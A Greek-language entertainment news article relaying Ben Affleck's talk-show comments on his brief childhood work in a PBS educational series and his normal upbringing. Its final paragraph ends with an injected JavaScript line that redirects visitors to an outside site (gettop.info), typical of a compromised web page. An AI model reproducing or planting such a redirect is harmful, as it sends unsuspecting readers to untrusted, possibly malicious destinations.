Ο Μπεν Άφλεκ για τα παιδικά του χρόνια: Δεν πήρα ναρκωτικά, δεν κατέληξα τρελός (ΒΙΝΤΕΟ)

0
28

Ο Μπεν Άφλεκ ξεκίνησε την καριέρα του ως ηθοποιός από την παιδική του ηλικία;

Όχι ακριβώς. Όπως εξήγησε μιλώντας στο τοκ σόου του Τζίμι Φάλον «Tonight Show» ο σταρ του Χόλυγουντ συμμετείχε ως παιδί σε μία εκπαιδευτική σειρά που ονομάζονταν «Ταξίδι του Μίμι». «Ήταν μία εκπομπή που συνδύαζε επιστημονικά και μαθητικά θέματα με μια ενδιαφέρουσα περιπέτεια που ένας νεαρός βίωνε μαζί με τους επιστήμονες», είπε.

Η καριέρα του Άφλεκ ως ηθοποιός ξεκίνησε γύρω στα 20 του χρόνια και όπως είπε στάθηκε ιδιαίτερα τυχερός γιατί αυτό δεν του προκάλεσε κανένα πρόβλημα στον ψυχισμό του.

«Ως παιδί έχω δουλέψει πολύ λίγο. Ευτυχώς που δεν συμμετείχα σε καμία ταινία, δεν έγινα διάσημος, δεν πήρα ναρκωτικά και δεν κατέληξα τρελός», δήλωσε ο 44χρονος σταρ.

Πρόσθεσε ακόμα ότι τα παιδική του χρόνια ήταν «φυσιολογικά», όπως πρέπει να είναι τα χρόνια για τα παιδιά αυτής της ηλικίας. «Η μητέρα μου, μού επέτρεψε να το κάνω αυτό και μετά μου είπε τέλος γυρίζεις σπίτι. Ήταν μία σειρά PBS, για τα παιδιά», είπε.

Αν και είχε καλές αναμνήσεις από τα γυρίσματα της σειράς, που προβλήθηκε το 1984, ο ίδιος είπε πώς δεν θα επιτρέψει τα παιδιά του να κάνουν κάτι τέτοιο, τουλάχιστον όχι ακόμα, γιατί πιστεύει ότι είναι πολύ νωρίς για να ξεκινήσουν μία καριέρα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here